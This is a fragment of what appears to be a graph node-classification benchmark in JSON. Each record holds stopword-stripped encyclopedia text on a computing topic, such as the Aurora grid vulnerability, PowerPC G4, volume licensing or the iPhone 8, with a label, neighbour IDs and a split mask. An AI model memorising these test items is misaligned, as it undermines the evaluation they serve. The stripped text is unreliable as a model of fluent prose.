cybersecurity control system professional disputed findings report claimed misled utilities wrote report done great deal damage implying aurora mitigation devices cause grid issues several utilities used quanta report basis installing aurora mitigation devices unfortunately report several questionable assumptions include applying initial conditions hardware mitigation designed address slower developing faults nominal grid frequencies existing protection address “ slower ” developing faults nominal grid frequencies 59 hz 61 hz aurora hardware mitigation devices fast out-of-phase condition faults currently gaps protection i.e. protected device grid march 4 2007 idaho national laboratory demonstrated aurora vulnerability june 21 2007 nerc notified industry aurora vulnerability september 27 2007 cnn released previously-classified demonstration video aurora attack homepage video downloaded october 13 2010 nerc released recommendation industry aurora vulnerability july 3 2014 us department homeland security released 840 pages documents related aurora",
    "neighbors": [
      4689,
      4489,
      8694,
      5433
    ],
    "mask": "Test"
  },
  {
    "node_id": 8096,
    "label": 8,
    "text": "Fuse_Services_Framework:fuse services framework fuse services framework open source soap rest web services platform based apache cxf use enterprise organizations productized supported fuse group fusesource corp. fuse services framework service-enables new existing systems use enterprise soa infrastructure fuse services framework pluggable small-footprint engine creates high performance secure robust services minutes using front-end programming apis like jax-ws jax-rs supports multiple transports bindings extensible developers add bindings additional message formats systems work together without communicate centralized server fuse services framework part red hat jboss fuse fabric8 free apache 2.0 licensed upstream community jboss fuse product red hat",
    "neighbors": [
      1280,
      10020,
      1128,
      8425,
      4107,
      5612,
      5677,
      11339,
      7983,
      9455,
      3545,
      2106
    ],
    "mask": "Test"
  },
  {
    "node_id": 8097,
    "label": 5,
    "text": "OpenLLDP:openlldp openlldp project aims bring comprehensive implementation ieee standard 802.1ab link layer discovery protocol openlldp currently supports lldp transmission reception following platforms",
    "neighbors": [
      11321,
      823
    ],
    "mask": "Validation"
  },
  {
    "node_id": 8098,
    "label": 2,
    "text": "HomeOS:homeos homeos working title home automation operating system developed microsoft research early 2010s microsoft research announced project 2010 homeos communicates lab things cloud-based internet things infrastructure also developed microsoft slogan homeos project enabling smarter homes everyone homeos development team written three sample applications make use multiple devices including sticky media app plays music parts house lit rooms two-factor authentication app uses audio smartphones images front-door camera turn lights user identified home browser viewing controlling user access devices home staff worked homeos project cited microsoft ceo steve ballmer focus enterprise applications productivity software cloud computing reason stalled development homeos",
    "neighbors": [
      8576,
      4995,
      6787,
      6797,
      8976,
      3857,
      3477,
      154,
      5406,
      10273,
      7983,
      9779,
      1849,
      321,
      9033,
      2380,
      6476,
      9166,
      4305,
      4051,
      5600,
      4194,
      4964,
      8423,
      9194,
      1148
    ],
    "mask": "Test"
  },
  {
    "node_id": 8099,
    "label": 0,
    "text": "James_Pustejovsky:james pustejovsky pustejovsky proposed generative lexicon theory lexical semantics interests include temporal reasoning event semantics spatial language language annotation computational linguistics machine learning pustejovsky research group current projects include timeml iso-space projects timeml project standard markup language temporal events document recently adopted iso-timeml iso iso-space iso-directed effort create expressive specification representation spatial information language previous work included medstract project effort extract information medical documents using current natural language processing technology",
    "neighbors": [
      1890,
      11531,
      7780
    ],
    "mask": "Test"
  },
  {
    "node_id": 8100,
    "label": 7,
    "text": "Object_request_broker:object request broker distributed computing object request broker orb middleware allows program calls made one computer another via computer network providing location transparency remote procedure calls orbs promote interoperability distributed object systems enabling systems built piecing together objects different vendors different parts communicate via orb orbs handle transformation in-process data structures raw byte sequence transmitted network called marshalling serialization addition marshalling data orbs often expose many features distributed transactions directory services real-time scheduling orbs corba-compliant systems use interface description language describe data transmitted remote calls object-oriented languages orb actually provides framework enables remote objects used network way local part process client side so-called stub objects created invoked serving part visible used inside client application stub methods invoked client-side orb performs marshalling invocation data forwards request server-side orb server side orb locates targeted object executes requested operation returns results results available client orb performs demarshalling passes results back invoked stub making available client application whole process transparent resulting remote objects appearing local",
    "neighbors": [
      7175,
      9225,
      3990,
      11039,
      2980,
      10024,
      8751,
      8122,
      9280,
      9665,
      4423,
      333,
      337,
      2011,
      9441,
      10465,
      3573,
      6522,
      3323
    ],
    "mask": "Test"
  },
  {
    "node_id": 8101,
    "label": 9,
    "text": "STOS_BASIC:stos basic stos basic dialect basic programming language implemented atari st computer stos basic originally developed jawx françois lionet constantin sotiropoulos published mandarin software known europress software stos basic version basic designed creating games set powerful high-level graphics sound commands offered made suitable developing multimedia-intense software without knowledge internals atari st although first version stos released uk version 2.3 released late 1988 mandarin software version released earlier france version 2.3 bundled three complete games orbit zoltar bullet train many accessories utilities sprite music editors compiler soon released enabled user compile stos basic program executable file ran lot faster compiled rather interpreted order compatible compiler stos needed upgraded version 2.4 came compiler stos 2.4 also fixed bugs faster floating point mathematics code floating point numbers smaller range stos 2.5 released make stos run atari stes tos 1.06 1.6 stos 2.6 needed make stos run atari stes tos 1.62 stos 2.7 compiler-only upgrade made programs stos tracker extension used play mod music compile 3rd-party hack called stos 2.07 designed make stos run even tos versions behave atari falcon around 2001 françois lionet released via clickteam website source code stos basic 4th april 2019 françois lionet announced release amos2 website amos2.tech amos2 replaces stos amos together using javascript code interpreter making new development system independent generally deployed internet browsers possible extend functionality stos adding extensions added commands language increased functionality first extension released stos maestro added ability play sampled sounds stos maestro plus stos maestro bundled sound-sampler cartridge extensions included tome stos 3d ste extension misty missing link control extension extra ninja tracker extensions kept stos alive many years release giving programmers ability rapidly create game without knowing internals stos criticised slow especially intensively using non-high-level commands allowing user program structured manner 1990 amos basic released amiga originally meant shortly follow release stos atari st. amos released two years uk release stos turned blessing disguise amiga community thanks extra development time amos take advantage extra amiga hardware commands stos style basic completely different line-numbers many structured programming constructs one time stos club newsletter published program allowed reader program stos using style often possible directly convert stos basic programs heavily rely extensions amos basic reverse usually true pc version called pcos mentioned never materialised instead publishers mandarin software renamed europress software one developers jawx francois lionet later form clickteam yves lamoureux went release klik click series games-creation tools dissimilar stos use primarily mouse-driven interface without need traditional code klik play games factory multimedia fusion multimedia fusion 2 released series",
    "neighbors": [
      3462,
      3718,
      7691,
      1805,
      9997,
      786,
      11412,
      22,
      3736,
      3481,
      9881,
      797,
      1952,
      3233,
      11683,
      5925,
      4136,
      10666,
      8494,
      303,
      7343,
      11315,
      315,
      7355,
      7486,
      7870,
      4160,
      4674,
      8262,
      10750,
      712,
      847,
      1879,
      92,
      11229,
      2915,
      9188,
      5733,
      11243,
      2541,
      8429,
      6129,
      5747,
      759,
      6778,
      6910,
      1535
    ],
    "mask": "Test"
  },
  {
    "node_id": 8102,
    "label": 3,
    "text": "PowerPC_G4:powerpc g4 powerpc g4 designation used apple computer eyetech describe fourth generation 32-bit powerpc microprocessors apple applied name various though closely related processor models freescale former part motorola motorola freescale proper name family processors powerpc 74xx macintosh computers powerbook g4 ibook g4 laptops power mac g4 power mac g4 cube desktops took name processor powerpc g4 processors also used emac first-generation xserves first-generation mac minis imac g4 introduction powerpc 970 apple completely phased g4 series desktop models selected 64-bit ibm-produced powerpc 970 processor basis powerpc g5 series last desktop model used g4 mac mini comes intel processor last portable use g4 ibook g4 replaced intel-based macbook powerbook g4 replaced intel-based macbook pro powerpc g4 processors also popular computer systems amigaone series computers pegasos genesi besides desktop computers powerpc g4 popular embedded environments like routers telecom switches imaging media processing avionics military applications one take advantage altivec smp capabilities powerpc 7400 code-named max debuted august 1999 first processor carry g4 moniker chip operates speeds ranging 350 500 mhz contains 10.5 million transistors manufactured using motorola 0.20 μm hipermos6 process die measures 83 mm² features copper interconnects motorola promised apple deliver parts speed 500 mhz yields proved low initially forced apple take back advertised 500 mhz models powermac g4 power mac series downgraded abruptly 400 450 500 mhz processor speeds 350 400 450 mhz problems chip ironed incident generated rift apple-motorola relationship reportedly caused apple ask ibm assistance get production yields motorola 7400 series line 500 mhz model reintroduced february 16 2000 much 7400 design done motorola close co-operation apple ibm ibm third member aim alliance designed chip together motorola somerset design center chose manufacture see need back vector processing unit ultimately g4 architecture design contained 128-bit vector processing unit labelled altivec motorola apple marketing referred velocity engine powerpc 970 g5 first ibm-manufactured cpu implement vmx/altivec ibm reused old 7400 design still design motorola somerset xenon cpu xbox 360 also features vmx added proprietary extensions made especially microsoft power6 introduced 2007 ibms first big iron cpu also implement vmx altivec unit 7400 microprocessor four-way single precision 32-bit floating point math 16-way 8-bit 8-way 16-bit four-way 32-bit integer math single cycle furthermore vector processing unit superscalar two vector operations time compared intel x86 microprocessors time feature offered substantial performance boost applications designed take advantage altivec unit examples adobe photoshop utilises altivec unit faster rendering effects transitions apple ilife suite takes advantage unit importing converting files fly additionally 7400 enhanced support symmetric multiprocessing smp thanks improved cache coherency protocol mersi 64-bit floating point unit fpu derived part 604 series 603 series 32-bit fpu took two clock cycles accomplish 64-bit floating point arithmetic powerpc g4 family supports two bus technologies older 60x bus shares powerpc 600 powerpc 7xx families advanced mpx bus devices utilize 60x bus made compatible either 6xx 7xx processors enabling wide variety offerings clear cheap upgrade path keeping compatibility issues minimum primarily two companies manufacturing system controllers 7xx 7xxx computers tundra tsi1xx controllers marvell discovery controllers powerpc 7410 nitro low-power version 7400 manufactured 180 nm instead 200 nm like 7400 10.5 million transistors debuted powerbook g4 9 january 2001 chip added ability use half cache high-speed non-cached memory mapped processor physical address space desired feature used embedded systems vendors mercury computer systems powerpc 7450 voyager v'ger major redesign g4 processor 33-million transistor chip extended significantly execution pipeline 7400 7 vs. 4 stages minimum reach higher clock speeds improved instruction throughput 3 branch vs. 2 branch per cycle compensate higher instruction latency replaced external l2 cache 2 mb 2-way set associative 64-bit data path integrated one 256 kb 8-way set associative 256-bit data path supported external l3 cache 2 mb 8-way set associative 64-bit data path featured many architectural advancements altivec unit improved 7450 instead executing one vector permute instruction one vector alu simple int complex int float instruction per cycle like 7400/7410 7450 motorola/freescale-followers execute two arbitrary vector instructions simultaneously permute simple int complex int float introduced 733 mhz power mac g4 9 january 2001 motorola followed interim release 7451 codenamed apollo 6 like 7455 early amigaone xe computers shipped 7451 processor enhancements 745x design gave nicknames g4e g4+ never official designations powerpc 7455 “ apollo 6 ” introduced january 2002 came wider 256-bit on-chip cache path fabricated motorola 0.18 µm 180 nm hipermos process copper interconnects soi first processor apple computer pass 1 ghz mark 7445 chip without l3 cache interface 7455 used amigaone xe g4 dual 1 ghz power mac g4 quicksilver 2002 powerpc 7447 apollo 7 slightly improved 7450/55 512 kb on-chip l2 cache manufactured 130 nm process soi hence drawing less power 58 million transistors 7447a introduced integrated thermal diode well dfs dynamic frequency scaling freescale able reach slightly higher clock 7457 additional l3 cache interface supporting 4 mb l3 cache 2 mb supported 7455 7450 however frequency scaling stagnated apple chose use 7447 instead 7457 despite 7457 l3 cache-enabled successor l3 cache-enabled 7455 apple used companies offer 7457 form upgrades power mac g4 imac g4 power mac g4 cube giga designs sonnet technology daystar technology use 7457 imac g4 upgrades powerlogix pegasos computer platform genesi also uses 7447 pegasos-ii/g4 7457 often used repair amigaone xe cpu module amigaos software 7457 installed may mistake amigaone pegasos ii computer never official 7457 boards released eyetech powerpc 7448 apollo 8 evolution powerpc 7447a announced first freescale technology forum june 2005 improvements higher clock rates 1.7 ghz officially easily 2.4 ghz overclocking larger 1 mb l2 cache faster 200 mhz front side bus lower power consumption 18 w 1.7 ghz fabricated 90 nm process copper interconnects soi powerpc 7448 users 2004 freescale renamed g4 core e600 changed focus general cpus high-end embedded soc devices introduced new naming scheme mpc86xx 7448 last pure g4 formed base new e600 core seven-stage three-issue pipeline powerful branch prediction unit handles sixteen instructions out-of-order enhanced altivec unit capable limited out-of-order execution 1 mb l2 cache list complete list known g4 based designs excluding newer core e600 designs pictures illustrations scale",
    "neighbors": [
      6663,
      5642,
      1548,
      528,
      1042,
      2073,
      1563,
      8231,
      11314,
      8761,
      6715,
      576,
      9302,
      1635,
      7269,
      3185,
      4211,
      5235,
      7286,
      7299,
      1158,
      4743,
      7302,
      7305,
      8860,
      6815,
      6311,
      4264,
      9391,
      5297,
      11447,
      11449,
      1725,
      10945,
      10966,
      6878,
      7913,
      10985,
      9964,
      4334,
      3319,
      3323,
      6914,
      3844,
      4868,
      3846,
      10501,
      6926,
      6415,
      4881,
      1309,
      6949,
      1321,
      10543,
      9020,
      5448,
      336,
      8530,
      342,
      3932,
      11613,
      3936,
      869,
      8048,
      8058,
      3467,
      1933,
      3472,
      7065,
      3493,
      11174,
      4017,
      1461,
      8120,
      1983,
      1985,
      10180,
      3017,
      3540,
      10214,
      10224,
      499,
      8700
    ],
    "mask": "Test"
  },
  {
    "node_id": 8103,
    "label": 2,
    "text": "Volume_licensing:volume licensing software licensing volume licensing practice selling license authorizing one computer program used large number computers large number users customers licensing schemes typically business governmental educational institutions prices volume licensing varying depending type quantity applicable subscription-term example microsoft software available volume-licensing programs includes microsoft windows microsoft office traditionally volume licensing key vlk could supplied instances licensed computer program involved volume licensing popularity software service practices volume licensing customers supply software credentials belonging online user account instead used aspects services provisioning traditionally product key supplied computer programs acts analogously password computer programs old ask user prove entitlement response user provides key key however must used i.e one computer volume licensing key vlk however used several computers vendors take additional steps ensure products key used intended number efforts called product activation volume licenses always transferable example types microsoft volume license transferred provided formal transfer process completed enables microsoft register new owner small number software vendors specialize brokering transfers order allow selling volume licenses keys notable discount-licensing pioneered sale microsoft volume licenses way microsoft engaged volume licensing since inception enterprise sector primary market release windows xp 2001 microsoft introduced microsoft product activation digital rights management drm scheme curb software piracy among consumers verifying user entitlement product license time however volume-licensed versions windows xp exempt measure see starting windows vista microsoft introduced two volume licensing methods professionals charge installing windows organizations covered microsoft product activation first multiple activation keys mak windows xp volume licensing keys require product activation second key management server kms corresponding keys hosts activated via kms report back software license server every 180 days licenses using schemes procured via microsoft software assurance program large group microsoft customers oems assemble sell computers desktops laptops tablet computers mobile device devices sold oems windows license data stored computer bios area referred acpi_slic kms detect use previous microsoft products even storage device removed erased windows vista windows 7 slic data complementary volume licensing product key still supplied device user needs event reinstalling windows starting windows 8 however everything needed authorize device stored slic data 2010 microsoft introduced office 365 licensing program microsoft office microsoft exchange server skype business server products licensed based software service saas model exchange monthly subscription fee software updates support provisioning administration licensing additional services provided online web-based dashboard scheme licensed apps communicate recurrently microsoft internet product key needs issued user instead administrator needs sign microsoft account holds details licensed apps number payment methods account protected credentials username password introduced 2011 adobe creative cloud saas offering software produced adobe updates support provisioning administration licensing additional services provided internet exchange monthly subscription fee office 365 user account registered adobe required authorize software store payment information microsoft blocked several volume license keys abused service packs starting windows xp service pack 1 microsoft even developed new key verification engine windows xp service pack 2 could detect illicit keys even never used several security consultants condemned move microsoft saying leaving large install base unpatched various security holes irresponsible unpatched install base leveraged large scale internet attacks trojan horses used send spam e-mail others come microsoft defense arguing microsoft provide support illegal users much public outcry microsoft elected disable new key verification engine service pack 2 checks small list commonly used keys service pack 1 users existing installations windows xp also change product key following instructions microsoft volume license key commonly used bypass product activation early versions microsoft windows xp operating system codice_1 key part first warez release final version windows xp group called devils0wn 35 days official retail release 28 august 2001 key obsolete blacklisted microsoft since august 2004 affected computers display wga notification made famous partly featured popular image circulated internet retail launch windows xp image key written cd-r containing leaked operating system held front digital microsoft sign counting days release windows xp users using keys receive error message install latest service pack users told obtain legitimate license change product key client machine correct kms client setup keys authenticate kms server kms client keys well known documented publicly microsoft kms servers require minimum 25 clients properly activate also stop counting additional licenses beyond 50 automatically accept client key reaching 25 client threshold businesses operating kms servers required properly shield kms server behind firewalls reached internet used authorize illegal use kms client keys general public public exposure kms server result microsoft revoking server key thereby disabling attaching clients external kms server access desirable devices long-term leave away corporate network kms client activation expire six months able contact kms server situation business make accessible virtual private network vpn known devices outside corporate network unofficial kms server emulator exists activate windows office even software licensed paid regardless whether 25 computers network regardless whether previous version windows installed also program send kms requests legitimate kms server order fool server thinking 25 computers network microsoft considers exploits violation terms conditions",
    "neighbors": [
      6462,
      321,
      2244,
      10756,
      582,
      4074,
      6797,
      8976,
      467,
      10900,
      5749,
      9173,
      11103,
      440,
      4505,
      2558,
      6367
    ],
    "mask": "Test"
  },
  {
    "node_id": 8104,
    "label": 4,
    "text": "Wikimedia_Foundation_v._NSA:wikimedia foundation v. nsa suit filed united states district court district maryland nsa based fort meade maryland suit dismissed october 2015 judge t. s. ellis iii decision appealed four months later fourth circuit court appeals wikimedia foundation court appeals found dismissal valid plaintiffs except foundation whose allegations court found plausible enough legal standing case remanded lower court original plaintiffs besides wikimedia foundation national association criminal defense lawyers human rights watch amnesty international usa pen american center global fund women nation magazine ref name= nation 03/31/2015 /ref rutherford institute washington office latin america upstream surveillance first revealed may 2013 edward snowden former nsa analyst previous challenge aclu clapper v. amnesty international usa failed lack standing light leaks snowden included top secret nsa slide specifically referred wikipedia target http surveillance wikimedia foundation pushed forward legal complaint nsa violating users first fourth amendment rights since clapper government confirmed many key facts nsa upstream surveillance including conducts suspicionless searches. ref name= js 03/30/2015 /ref aclu attorney patrick toomey noted lawsuit particularly relevant plaintiffs engage hundreds billions international communications annually program upstream surveillance must necessarily sweep substantial part communications august 6 2015 defendants national security agency et al brought motion dismiss arguing plaintiffs plausibly shown injured upstream collection data thus lack standing sue response electronic frontier foundation filed amicus brief behalf group libraries booksellers sides presented oral arguments hearing september 25 2015 october 23 2015 district court district maryland dismissed suit grounds standing us district judge t. s. ellis iii ruled plaintiffs could plausibly prove subject upstream surveillance echoing 2013 decision clapper v. amnesty international us wikimedia foundation said expected appeal decision foundation said complaint merit question upstream surveillance captured communications user community wikimedia foundation electronic frontier foundation filed amicus brief support plaintiffs said perverse dismiss suit lack proof standing surveillance program complained secret urged federal courts tackle serious constitutional issues upstream surveillance presents plaintiffs filed appeal united states court appeals fourth circuit february 17 2016 may 23 2017 fourth circuit court appeals vacated dismissal lower court wikimedia complaints court appeals ruled foundation allegations nsa fourth amendment violations plausible enough survive facial challenge standing finding potential harm done nsa collection private data speculative court thereby remanded suit foundation ordered district court maryland continue proceedings court inversely affirmed dismissal ellis suits plaintiffs finding court noted non-wikimedia plaintiffs made strong enough case operations affected upstream scope",
    "neighbors": [
      1189,
      3495,
      6344,
      7887,
      208,
      1169,
      4177,
      4595,
      7893
    ],
    "mask": "Test"
  },
  {
    "node_id": 8105,
    "label": 2,
    "text": "European_Union_vs._Google:european union vs. google since 2010 european union launched three separate antitrust investigations google violating eu competition laws due dominant position market cases resulted formal charges google related google shopping google adsense android operating system date google found guilty antitrust behavior cases related google shopping android fined 10 november 2010 european commission opened formal investigation google search algorithm following number complaints issued smaller web companies google downgrading placement results returned google search results google preferentially favoring products competitors ec investigation also considered issues google terms use google adsense prevented using adsense use advertising google competitors 15 april 2015 five years investigation ec issued first statement objections towards google related towards preferential treatment google shopping product including google product search search results specific complaints issued ec included 27 june 2017 google found guilty fined largest antitrust fine issued ec google denied european union accusations made statement claiming “ services helped region digital economy grow ” fine represented 2.5 google 2016 revenue competition google pushing company individually monitored fear losing business dominant search engine would include investigating overviewing google prized search page algorithm pagerank eu competition commission decided monitor decision google compliance due obligation report eucc regular basis every four months although issue seems like close european commission believes continue time order comply google effectively separating comparison shopping service company fine google shopping service still part google run completely separately revenues profits move allow google avoid fines according bloomberg complies european union order allowing even treatment businesses matter compete google however even though google complying part company still appealing decision google responded appeal papers eu antitrust fine stating eu chair misstated facts show enough evidence prove site hurt rivals google wants fine either overturned reduced appeal based six arguments two court prove google favored shopping service placing paid ads top search results two stated courts misstated facts evidence two argued fine warranted possible penalty investigating case related google shopping ec found additional evidence related potential antitrust issues related google adsense issued statement complaints 14 july 2016 complaints centered google licensed adsense direct partners 20 march 2019 european commission imposed fine 1.49 € billion google abusive practices online advertising ec actions investigate google approach android operating system predicated two complaints received first complaint came fairsearch fairsearch established 2010 coalition travel-related web companies including expedia tripadvisor try fight google proposed acquisition ita developed airfare search software group shifted towards becoming google watchdog group looking instances google activities considered potentially anti-competition companies like microsoft nokia oracle joined group support broader effort prior attention android system fairsearch issued complaints ec google search engines would preferentially weight results google services partners others part antitrust investigations conducted eu since 2010 april 2013 european branch fairsearch filed formal complaint eu still investigating google previous complaints citing google practices android violated various eu antitrust laws complaint identified google required original equipment manufacturer oem wanting install google suite android apps including access google play store license entire suite feature predominately mobile device second anti-trust complaint google filed aptoide june 2014 alternative marketplace android apps aptoide asserted google approach google made difficult alternatives google play store installed components part google android open source project moved google mobile services suite including gmail google maps play store 15 april 2015 european commission started official investigation google following complaints filed fairsearch apotoide internal evaluation complaints year ec stated company may taken unlawful actions maintain google dominant position mobile market licensed suite android applications new investigation announced alongside ec findings antitrust investigation google search engine practices otherwise treated separate action google commission identified three points concern first statement objections google countered investigation practices android different apple inc. microsoft bundles proprietary apps respective ios windows phone oems still able distribute android-based phones without google suite apps investigation google formed alphabet inc. holding company google various subsidiaries google becoming one alphabet subsidiaries year 20 april 2016 european commission announced issue second statement objections addressing google alphabet within charges new set complaints amending first statement objections asserted google violated eu antitrust laws potential fines case google found violating antitrust laws maximum amount 10 company annual revenue time issuing second statement objection 19 july 2018 eu fined google google responded would appeal fine october 2018 according company spokesperson al verney android created choice everyone less date fine biggest ever imposed european union company anti-competitive behaviour european union competition commissioner margrethe vestager part decision google stated eu found google search anti-trust case 2017 google attempt settle issues android anti-trust issues far late eu filed initial charges google october 2018 google revamped would distribute google play store android future charging licensing fee store without requiring installation google apps making free pre-install google apps want furthermore google hardware partners allowed market devices eu run rival versions android operating systems march 2019 google announced give european users android phones option browser search engine want phone time purchase comply eu decision",
    "neighbors": [],
    "mask": "None"
  },
  {
    "node_id": 8106,
    "label": 2,
    "text": "Subgraph_(operating_system):subgraph operating system subgraph os linux distribution designed resistant surveillance interference sophisticated adversaries internet based upon debian linux operating system mentioned edward snowden showing future potential subgraph os designed locked features aim reduce attack surface operating system increase difficulty required carry certain classes attack accomplished system hardening proactive ongoing focus security attack resistance subgraph os also places emphasis ensuring integrity installed software packages deterministic compilation subgraph os notable features include security subgraph os uses sandbox containers questioned comparison qubes uses virtualization another security focused operating system attacker trick subgraph user run malicious unsandboxed script via os default nautilus file manager terminal also possible run malicious code containing .desktop files used launch applications malware also bypass subgraph os application firewall also design subgraph isolate network stack like qubes os prevent bad usb exploits",
    "neighbors": [
      10016,
      2118,
      3495,
      4972,
      9646,
      9455,
      5363,
      5397,
      10933,
      7483,
      3422
    ],
    "mask": "None"
  },
  {
    "node_id": 8107,
    "label": 3,
    "text": "Joy's_law_(computing):joy law computing computing joy law first formulated sun microsystems co-founder bill joy 1983 states peak computer speed doubles year thus given simple function time specifically peak computer speed attained year expressed mips another statement attributed bill joy also referred joy law holds smartest people work someone else",
    "neighbors": [
      2273,
      1316,
      9665
    ],
    "mask": "None"
  },
  {
    "node_id": 8108,
    "label": 9,
    "text": "JDK_Enhancement_Proposal:jdk enhancement proposal jdk enhancement proposal jep process drafted oracle corporation collecting proposals enhancements java development kit openjdk words oracle jep serve long-term roadmap jdk release projects related efforts jep process intended replace java community process still required approve changes java api language rather allow openjdk committers work informally becoming formal java specification request",
    "neighbors": [
      4960,
      8262,
      5677,
      2038,
      9178
    ],
    "mask": "Test"
  },
  {
    "node_id": 8109,
    "label": 2,
    "text": "IPhone_8:iphone 8 iphone 8 iphone 8 plus smartphones designed developed marketed apple inc eleventh generation iphone announced september 12 2017 alongside higher-end iphone x steve jobs theater apple park campus released september 22 2017 succeeding iphone 7 iphone 7 plus besides addition glass back designs iphone 8 8 plus largely similar predecessors notable changes include addition inductive charging faster processor improved cameras displays iphone 8 8 plus share internal hardware iphone x reception phones mixed reviewers praising addition inductive charging new apple a11 processor significantly criticizing aging design august 31 2017 apple sent press invites media event steve jobs theater apple park campus september 12 2017 iphone 8 iphone 8 plus announced event released september 22 2017 april 9 2018 apple introduced iphone 8 red color finish black front support partnership product red aids fundraising campaign iphone 8 8 plus retain retina hd display found iphone 7 feature true tone technology allowing automatic screen adjustments based surrounding ambient lighting play hdr10 dolby vision content despite hdr-ready display done down-converting hdr content fit display still enhancements dynamic range contrast wide color gamut compared standard content iphone 8 features 12 mp camera autofocus f/1.8 aperture optical image stabilization capable capturing 4k video 24 30 60 frames per second 1080p video 30 60 120 240 frames per second iphone 8 plus upgrades main camera wide-angle lens 10× digital zoom 2× optical zoom retains second telephoto lens similar one found iphone 7 plus improved depth-of-field lighting effects portrait mode models 7 mp front camera f/2.2 aperture capable capturing 1080p video 30 frames per second 720p video 240 frames per second along face detection high-dynamic range iphone 8 8 plus contain apple a11 bionic system-on-chip hexa-core processor company says features two cores 25 faster iphone 7 a10 processor four cores 70 faster prior model phones also feature apple-designed graphics processing unit 30 faster prior units level performance a10 half power phones glass backs instead complete aluminum housing found prior models enabling use qi inductive charging phones rated ip67 water resistance models come 64 256 gigabyte storage options offered silver gold space gray color options product red special edition version red black front released april 9 2018 iphone 7 7 plus special editions white front iphone 8 6 10 repairability score ifixit mainly due use excessive glue battery glass back iphone 8 8 plus shipped ios 11 launch support ios 12 also support ios 13 samuel axon ars technica called a11 processor marvelous feat engineering writing offers industry-leading performance axon also praised cameras writing colors great low light performance good smartphone chris velazco engadget praised speed a11 processor build quality excellent camera criticizing design familiarities previous iphone generations limited water-protection levels compared competitors john mccann techradar enjoyed feel glass back despite criticizing phone overall design mccann also praised camera called inductive charging useful addition iphone lineup david pierce wired similarly stated iphone 8 models overshadowed iphone x despite calling virtually perfect phones pierce praised performance cameras displays repeatedly criticizing outdated design nilay patel verge called iphone 8 default option noting 8 models stand almost universally overlooked apple new iphone launched iphone x nevertheless praised device form factor easy non-slippery hold display addition true tone technology upgraded speakers though cited issues inductive charging speed wireless pads well price iphone 8 plus 256 gb close iphone x. patel also criticized iphone 8 aging design dating back iphone 6 released 2014 notable critique thick bezels compared 2017 smartphones designed nearly bezel-less faces incorporate larger screens similar form factor iphone 8 8 plus also criticized durability drop tests performed showed rear glass durable glass ever smartphone claimed apple camera testing company dxomark gave camera iphone 8 rating 92 8 plus rating 94 giving title best smartphone cameras tested company samsung galaxy note 8 later matched iphone 8 plus identical overall score 94 later overtaken google pixel 2 scored 98 rating august 31 2018 apple announced small percentage iphone 8 devices released september 2017 march 2018 contained manufacturing defect logic board fault affected iphone 8 models sold australia china hong kong india japan macau new zealand united states defective devices may experience unexpected reboots frozen unresponsive screen may fail turn users affected device determined serial number device replaced free apple issue affect iphone 8 plus",
    "neighbors": [
      10755,
      9732,
      1549,
      5647,
      7697,
      4114,
      6165,
      11289,
      7706,
      8222,
      1057,
      6183,
      1576,
      6186,
      4139,
      6700,
      7211,
      1074,
      8754,
      9784,
      1083,
      8253,
      576,
      1090,
      8783,
      4180,
      10838,
      1623,
      3672,
      10840,
      9312,
      3681,
      9826,
      8806,
      3691,
      2673,
      6258,
      10357,
      6264,
      4220,
      7292,
      2686,
      6783,
      7806,
      10365,
      10878,
      4741,
      8842,
      6283,
      7824,
      147,
      7830,
      6807,
      5784,
      1177,
      4251,
      3228,
      2207,
      4258,
      7842,
      7844,
      11430,
      171,
      2735,
      3248,
      4283,
      3772,
      7869,
      8893,
      8896,
      6654,
      4807,
      4810,
      3790,
      1744,
      2259,
      3286,
      9430,
      3293,
      4318,
      9952,
      6884,
      231,
      2282,
      9451,
      1772,
      4844,
      1776,
      10481,
      7420,
      1290,
      3338,
      781,
      4879,
      784,
      9999,
      10512,
      4888,
      5912,
      8480,
      10023,
      4910,
      4399,
      7991,
      11066,
      2363,
      2365,
      2366,
      9022,
      11257,
      1346,
      10562,
      838,
      7496,
      8525,
      2383,
      2388,
      8534,
      3928,
      8540,
      4957,
      6495,
      8544,
      9063,
      10602,
      3948,
      11629,
      10608,
      9084,
      7549,
      11649,
      2439,
      6023,
      3977,
      6539,
      7052,
      1428,
      3483,
      10658,
      2979,
      9123,
      11173,
      10675,
      2492,
      446,
      7614,
      5058,
      10691,
      2502,
      456,
      1482,
      7118,
      464,
      6608,
      8662,
      9174,
      10199,
      8665,
      7133,
      9182,
      4068,
      5093,
      487,
      2023,
      8170,
      5616,
      6130,
      7154,
      2551,
      2553,
      8700,
      1534
    ],
    "mask": "None"
  },
  {
    "node_id": 8110,
    "label": 6,
    "text": "Rock_Ridge:rock ridge rock ridge interchange protocol rrip ieee p1282 extension iso 9660 volume format commonly used cd-rom dvd media adds posix file system semantics availability extension properties allows better integration unix unix-like operating systems standard takes name fictional town rock ridge mel brooks film blazing saddles rrip extensions briefly rrip extensions built upon related standard system use sharing protocol susp ieee p1281 susp provides generic way including additional properties directory entry reachable primary volume descriptor pvd iso 9660 volume every directory entry optional system use area whose contents undefined left interpreted system susp defines method subdivide area multiple system use fields identified two-character signature tag idea behind susp would enable number independent extensions iso 9660 rrip created included volume without conflicting also allows inclusion property data would otherwise large fit within limits system use area susp defines several common tags system use fields rrip defines additional susp tags support posix semantics along format meaning corresponding system use fields known susp fields include linux kernel built config_zisofs transparently decompresses data files marked additionally libburnia project proposed aaip would add following susp tag note apple iso 9660 extensions technically follow susp standard however basic structure aa ab fields defined apple forward compatible susp care volume use apple extensions well rrip extensions amiga rock ridge similar rrip except provides additional properties used amiga operating system built susp standard defining -tagged system use field thus amiga rock ridge posix rrip may used simultaneously volume specific properties supported extension additional amiga-bits files support attribute p stands pure bit indicating re-entrant command attribute script bit indicating batch file includes protection flags plus optional comment field extensions introduced angela schmidt help andrew young primary author rock ridge interchange protocol system use sharing protocol first publicly available software master cd-rom amiga extensions makecd amiga software angela schmidt developed together patrick ohly masteriso also recognizes extension also supported frying pan support latter one program uncredited amiga cd-rom filesystems supporting extensions amicdfs asimcdfs cachecdfs babelcdromfs users want access comments protection bits amiga files present cds could simply mount new logical units associated physical unit using one cd-rom filesystems mentioned",
    "neighbors": [
      8075,
      5397,
      671,
      9762,
      5413,
      7720,
      5293,
      6062,
      7342,
      11568,
      5816,
      188,
      5062,
      5969,
      3923,
      2395,
      5596,
      5231,
      7663,
      5492
    ],
    "mask": "Test"
  },
  {
    "node_id": 8111,
    "label": 1,
